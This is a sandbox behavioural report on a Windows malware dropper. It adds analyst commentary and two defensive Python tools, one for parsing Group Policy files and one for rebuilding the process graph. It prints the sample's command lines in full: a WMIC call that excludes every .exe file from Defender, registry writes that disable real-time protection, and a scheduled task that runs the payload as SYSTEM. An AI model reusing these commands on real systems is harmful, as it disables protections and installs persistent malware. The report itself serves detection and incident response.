Analysis
max time kernel: 150s
max time network: 147s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 07-04-2024 23:43
Static task: static1
Behavioral task: behavioral1
Sample: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
Resource: win7-20240221-en
General
Target: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
Size: 6.6MB
MD5: d3acc3ecd7d0ebba98f5cb5d40eca69e
SHA1: b47c16250eb0a92c3a2830b4fae6f2b31d22b44c
SHA256: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
SHA512: 12714b3c5c9a572c7a713aa0271e79b7801764d0a96e96f22b489815b45318855671379dd4f202b115bf3c81f97358d067fd5e0a7b67cef4484eb6a7d56cf59a
SSDEEP: 196608:91O+PM1g/Yk3wokBf8uLAlC3qsW4Ul2VmHZ4Dc7t:3O+PCg/IokBUuk2UlW/Dc5
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings 4 IoCs
DisableRealtimeMonitoring = 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender is the policy-managed switch for real-time protection and takes precedence over the user-level preference. The process tree shows the value written once with /reg:32 and once with /reg:64; both writes landed on the same, non-redirected key, which is why only one registry path appears here (compare the Wow6432Node duplicates in the exclusion writes below).
Processes: reg.exe, reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Windows security bypass 40 IoCs
Registry-based Windows Defender path exclusions. Every path is written twice, once per registry view (the /reg:32 and /reg:64 reg.exe pairs in the process tree), which produces the native and Wow6432Node entries below; Defender reads the native view, so the Wow6432Node copies are inert. The parallel writes to HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths, also visible in the tree, are not counted by this signature. One of the excluded paths is Chrome's per-profile Extensions directory.
Processes: reg.exe (20 instances)
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACH INE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Install.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Executes dropped EXE 3 IoCs
Processes: Install.exe, ZZfpWKo.exe, ZZfpWKo.exe
pid | process
2620 | Install.exe
1544 | ZZfpWKo.exe
2204 | ZZfpWKo.exe
Loads dropped DLL 4 IoCs
Processes: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe, Install.exe
pid | process
2036 | 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
2620 | Install.exe
2620 | Install.exe
2620 | Install.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in System32 directory 9 IoCs
The entries to note are the four by ZZfpWKo.exe: C:\Windows\system32\GroupPolicy\Machine\Registry.pol and gpt.ini are the local Group Policy store and its version counter, so the sample is installing its settings as machine policy (the scheduled tasks later run gpupdate.exe /force to apply them). The "Windows PowerShell.lnk" entries with an unexpanded %ProgramData% are a PowerShell start-up artefact that appears for every powershell.exe launch, not a file dropped by the sample.
Processes: powershell.exe, ZZfpWKo.exe, powershell.exe, powershell.EXE, powershell.EXE, powershell.EXE
description | ioc | process
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | ZZfpWKo.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | ZZfpWKo.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | ZZfpWKo.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | ZZfpWKo.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
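ZZfpWKo.exe writes Registry.pol and gpt.ini into the local Group Policy store, and the throw-away tasks then run gpupdate.exe /force (the decoded -EncodedCommand), which applies whatever that policy file contains as machine policy and can put the values back if a responder only deletes the registry keys. The report does not show the contents of the file. The following is an added example, not code from the report or the sample: a builder and parser for the Registry.pol format (MS-GPREG) and a filter for Windows Defender policy entries. The sample file is constructed here and is an assumption; its two Defender entries mirror the REG ADD policy writes seen in the process tree, and the third entry is unrelated filler so the filter has something to ignore. The parser can be pointed at a Registry.pol recovered from a host.

```python
"""Build and parse a Group Policy Registry.pol file (MS-GPREG) and flag
Windows Defender policy entries.  Added example; SAMPLE_ENTRIES is a
constructed file, not the contents recovered from the analysed sample."""
import struct

PREG_MAGIC = b"PReg"
PREG_VERSION = 1
REG_DWORD = 4


def _u16(text):
    return text.encode("utf-16-le")


def build_registry_pol(entries):
    """Serialise (key, value, type, data) tuples.  Each record is
    [key;value;type;size;data]: brackets and semicolons are UTF-16LE
    characters, key and value are NUL-terminated UTF-16LE strings, type and
    size are little-endian DWORDs, data is `size` raw bytes."""
    out = bytearray(PREG_MAGIC + struct.pack("<I", PREG_VERSION))
    for key, value, rtype, data in entries:
        out += _u16("[")
        out += _u16(key) + b"\x00\x00" + _u16(";")
        out += _u16(value) + b"\x00\x00" + _u16(";")
        out += struct.pack("<I", rtype) + _u16(";")
        out += struct.pack("<I", len(data)) + _u16(";")
        out += data + _u16("]")
    return bytes(out)


def parse_registry_pol(blob):
    """Return a list of (key, value, type, data) tuples, validating delimiters."""
    if blob[:4] != PREG_MAGIC:
        raise ValueError("missing PReg signature")
    if len(blob) < 8 or struct.unpack_from("<I", blob, 4)[0] != PREG_VERSION:
        raise ValueError("unsupported Registry.pol version")

    def read_string(p):
        q = p
        while True:  # step two bytes at a time: UTF-16 code units
            if q + 2 > len(blob):
                raise ValueError("unterminated string at offset %d" % p)
            if blob[q:q + 2] == b"\x00\x00":
                return blob[p:q].decode("utf-16-le"), q + 2
            q += 2

    def expect(p, ch):
        if blob[p:p + 2] != _u16(ch):
            raise ValueError("expected %r at offset %d" % (ch, p))
        return p + 2

    pos, entries = 8, []
    while pos < len(blob):
        pos = expect(pos, "[")
        key, pos = read_string(pos)
        pos = expect(pos, ";")
        value, pos = read_string(pos)
        pos = expect(pos, ";")
        rtype = struct.unpack_from("<I", blob, pos)[0]
        pos = expect(pos + 4, ";")
        size = struct.unpack_from("<I", blob, pos)[0]
        pos = expect(pos + 4, ";")
        data = bytes(blob[pos:pos + size])
        pos = expect(pos + size, "]")
        entries.append((key, value, rtype, data))
    return entries


DEFENDER_POLICY_PREFIX = r"software\policies\microsoft\windows defender"


def defender_policy_findings(entries):
    """Describe every entry under the Windows Defender policy key."""
    findings = []
    for key, value, rtype, data in entries:
        if not key.lower().startswith(DEFENDER_POLICY_PREFIX):
            continue
        if rtype == REG_DWORD and len(data) == 4:
            shown = struct.unpack("<I", data)[0]
        else:
            shown = data.hex()
        findings.append(f"{key}\\{value} = {shown}")
    return findings


# Constructed sample (assumption): mirrors the REG ADD policy writes in the
# process tree, plus one unrelated policy entry the filter should ignore.
SAMPLE_ENTRIES = [
    (r"Software\Policies\Microsoft\Windows Defender\Real-time Protection",
     "DisableRealtimeMonitoring", REG_DWORD, struct.pack("<I", 1)),
    (r"Software\Policies\Microsoft\Windows Defender\Exclusions\Paths",
     r"C:\Windows\Temp\HbtuuClNkkkdGbCN", REG_DWORD, struct.pack("<I", 0)),
    (r"Software\Policies\Microsoft\Windows\Personalization",
     "NoLockScreen", REG_DWORD, struct.pack("<I", 1)),
]

if __name__ == "__main__":
    blob = build_registry_pol(SAMPLE_ENTRIES)
    for line in defender_policy_findings(parse_registry_pol(blob)):
        print(line)
```

Keys in Registry.pol are stored without a hive; a file under GroupPolicy\Machine applies to HKLM, one under GroupPolicy\User to HKCU. For an incident, parse the file from the host with `parse_registry_pol(open(path, "rb").read())` and remove the Defender entries (or the whole local GPO) before trusting a registry clean-up.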
Drops file in Windows directory 1 IoCs
The task is created with /V1, i.e. in the legacy Task Scheduler 1.0 format, which is why it appears as a .job file under C:\Windows\Tasks rather than as XML under C:\Windows\System32\Tasks.
Processes: schtasks.exe
description | ioc | process
File created | C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Two patterns are present in the tree: one persistent task (bjzvzwrptCEFdBfgJx) that runs the dropped ZZfpWKo.exe from %TEMP% as SYSTEM, and three throw-away tasks (guivFWLjr, gqVzEotUY, ghvOphcQH) that each carry the same -EncodedCommand, are started immediately with /run /I (ignore the schedule) and then deleted.
Processes: schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe
pid | process
1940 | schtasks.exe
1128 | schtasks.exe
1644 | schtasks.exe
2556 | schtasks.exe
Enumerates system info in registry 2 TTPs 2 IoCs
Processes: Install.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Modifies data under HKEY_USERS 16 IoCs
HKU\.DEFAULT is the profile hive used by the SYSTEM account, so writes there from ZZfpWKo.exe, wscript.exe and powershell.exe confirm that this part of the chain runs as NT AUTHORITY\SYSTEM (consistent with the task created with /RU "SYSTEM" and the taskeng.exe parent in the process tree). The ZoneMap and Windows Script Host keys are created as a side effect of those tools starting under an account with no existing profile.
Processes: ZZfpWKo.exe, powershell.exe, wscript.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | ZZfpWKo.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000f0b31eba4589da01 | ZZfpWKo.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ZZfpWKo.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df6aba4589da01 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | ZZfpWKo.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | ZZfpWKo.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe
Suspicious behavior: EnumeratesProcesses 11 IoCs
The three powershell.EXE instances (2256, 1904, 2912) do not appear in the process tree below. The WriteProcessMemory signature shows 2256 being started by taskeng.exe and spawning gpupdate.exe, i.e. it is one of the scheduled gpupdate tasks; 1904 and 2912 have no parent recorded on this page.
Processes: powershell.exe, powershell.EXE, powershell.EXE, powershell.exe, powershell.EXE
pid | process | count
2368 | powershell.exe | 1
2256 | powershell.EXE | 3
1904 | powershell.EXE | 3
2836 | powershell.exe | 1
2912 | powershell.EXE | 3
Suspicious use of AdjustPrivilegeToken 37 IoCs
PowerShell enables SeDebugPrivilege when it starts and WMIC.exe enables a broad set of privileges at start-up, so these entries are tool baseline rather than a separate privilege-escalation step. Two details are still useful: WMIC.exe 2844 enables SeAssignPrimaryTokenPrivilege, which an administrator's token does not hold, consistent with the ZZfpWKo.exe chain running as SYSTEM; and tokens 33, 34 and 35 are privilege LUIDs the sandbox did not resolve (SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege).
Processes: powershell.exe, WMIC.exe, powershell.EXE, powershell.EXE, powershell.exe, WMIC.exe, powershell.EXE
pid | process | privileges enabled
2368 | powershell.exe | SeDebugPrivilege
548 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
2256 | powershell.EXE | SeDebugPrivilege
1904 | powershell.EXE | SeDebugPrivilege
2836 | powershell.exe | SeDebugPrivilege
2844 | WMIC.exe | SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
2912 | powershell.EXE | SeDebugPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Process creation itself writes into the new child's address space, so the sandbox records one or more "wrote to memory of" events for every spawn; these entries are therefore the parent/child edges of the process tree. The 64 records collapse to the twelve unique edges below, each shown with its repeat count. The taskeng.exe 2796 -> powershell.EXE 2256 -> gpupdate.exe 1724 chain is a scheduled task firing the encoded gpupdate command and does not appear in the process tree below.
Processes: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe, Install.exe, forfiles.exe, cmd.exe, powershell.exe, taskeng.exe, ZZfpWKo.exe, taskeng.exe, powershell.EXE
source pid (process) | target pid (target process) | count
2036 (99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe) | 2620 (Install.exe) | 7
2620 (Install.exe) | 2396 (forfiles.exe) | 7
2396 (forfiles.exe) | 2360 (cmd.exe) | 7
2360 (cmd.exe) | 2368 (powershell.exe) | 7
2620 (Install.exe) | 1940 (schtasks.exe) | 7
2368 (powershell.exe) | 548 (WMIC.exe) | 7
1608 (taskeng.exe) | 1544 (ZZfpWKo.exe) | 4
1544 (ZZfpWKo.exe) | 1128 (schtasks.exe) | 4
1544 (ZZfpWKo.exe) | 2872 (schtasks.exe) | 4
2796 (taskeng.exe) | 2256 (powershell.EXE) | 3
2256 (powershell.EXE) | 1724 (gpupdate.exe) | 3
1544 (ZZfpWKo.exe) | 1720 (schtasks.exe) | 4
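Because each WriteProcessMemory record names a parent and a child, the signature above is enough to rebuild the process graph without the tree, and the graph is where the proxy-execution pattern shows up: Install.exe never calls WMIC itself but reaches it through forfiles.exe /c, cmd /C and powershell, three binaries whose only job in the chain is to launch the next one. The following is an added example, not code from the report: it parses the records (copied from the signature, one line per unique edge; the parser tolerates the sandbox's repeats), walks each leaf back to its root, flags leaves reached through a run of proxy LOLBins, and lists what the Task Scheduler engine started. The LOLBin set and the run threshold are my choices, not something the report defines.

```python
"""Rebuild parent/child process edges from the sandbox's WriteProcessMemory
records and flag payloads reached through a run of proxy LOLBins.  Added
example, not part of the report; WPM_RECORDS lists the unique edges copied
from the signature above."""
import re

WPM_RECORDS = """
PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe
PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe
PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe
PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe
PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe
PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe
PID 1608 wrote to memory of 1544 1608 taskeng.exe ZZfpWKo.exe
PID 1544 wrote to memory of 1128 1544 ZZfpWKo.exe schtasks.exe
PID 1544 wrote to memory of 2872 1544 ZZfpWKo.exe schtasks.exe
PID 2796 wrote to memory of 2256 2796 taskeng.exe powershell.EXE
PID 2256 wrote to memory of 1724 2256 powershell.EXE gpupdate.exe
PID 1544 wrote to memory of 1720 1544 ZZfpWKo.exe schtasks.exe
"""

# "PID <parent> wrote to memory of <child> <parent> <parent image> <child image>"
RECORD_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)$")


def parse_edges(text):
    """Return (parent_of, image_of): child pid -> parent pid, pid -> image name."""
    parent_of, image_of = {}, {}
    for line in text.strip().splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            raise ValueError("unparsed record: " + line)
        ppid, cpid, pimg, cimg = int(m[1]), int(m[2]), m[3], m[4]
        parent_of[cpid] = ppid          # repeats simply overwrite with the same value
        image_of.setdefault(ppid, pimg)
        image_of.setdefault(cpid, cimg)
    return parent_of, image_of


def roots(parent_of):
    return sorted(set(parent_of.values()) - set(parent_of))


def leaves(parent_of):
    return sorted(set(parent_of) - set(parent_of.values()))


def chain_for(pid, parent_of, image_of):
    """Image names from the tree root down to pid."""
    chain = []
    while pid is not None:
        chain.append(image_of[pid])
        pid = parent_of.get(pid)
    return chain[::-1]


# Binaries used here only to start the next process (heuristic choice).
PROXY_LOLBINS = {"forfiles.exe", "cmd.exe", "powershell.exe"}


def find_proxy_chains(parent_of, image_of, min_run=3):
    """Leaves whose ancestry contains >= min_run consecutive proxy LOLBins."""
    hits = []
    for leaf in leaves(parent_of):
        chain = chain_for(leaf, parent_of, image_of)
        run = best = 0
        for image in chain[:-1]:            # the leaf itself is the proxied payload
            run = run + 1 if image.lower() in PROXY_LOLBINS else 0
            best = max(best, run)
        if best >= min_run:
            hits.append((leaf, chain))
    return hits


def task_launched(parent_of, image_of):
    """Processes started by the Task Scheduler engine (children of taskeng.exe)."""
    return sorted((pid, image_of[pid]) for pid, ppid in parent_of.items()
                  if image_of[ppid].lower() == "taskeng.exe")


if __name__ == "__main__":
    parent_of, image_of = parse_edges(WPM_RECORDS)
    for leaf, chain in find_proxy_chains(parent_of, image_of):
        print(leaf, " -> ".join(chain))
    for pid, image in task_launched(parent_of, image_of):
        print("task-launched:", pid, image)
```

On real EDR telemetry the same logic runs over process-creation events keyed by (parent pid, child pid); the threshold of three consecutive proxies keeps ordinary `cmd /C powershell` one-offs out of the results while still catching the forfiles chain used here.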
Processes
Each entry gives the process image, its command line, its PID and the signatures it triggered. The bracketed number is the depth in the process tree (1 = root) and children are indented under their parent. Where the image is under C:\Windows\SysWOW64 but the command line says System32, the process is 32-bit and subject to WOW64 file system redirection.

[1] C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"
    PID: 2036
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
      Command line: .\Install.exe /riRVBdidLX "385118" /S
      PID: 2620
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Loads dropped DLL
      - Enumerates system info in registry
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        (forfiles matches the single file where.exe in System32 and runs the /c command once for it; it is used only as a proxy to launch cmd)
        PID: 2396
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
          PID: 2360
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            PID: 2368
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\Wbem\WMIC.exe
              Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              PID: 548
              - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe\" Fi /nTsite_idiTD 385118 /S" /V1 /F
        PID: 1940
        - Drops file in Windows directory
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /run /I /tn "bjzvzwrptCEFdBfgJx"
        PID: 2668
[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {6E385E4A-D8D7-4369-91D4-303231E68A34} S-1-5-18:NT AUTHORITY\System:Service:
    (the Task Scheduler engine running as SYSTEM; it fires the bjzvzwrptCEFdBfgJx task created above, so from here on the dropped payload runs as NT AUTHORITY\SYSTEM)
    PID: 1608
    - Suspicious use of WriteProcessMemory
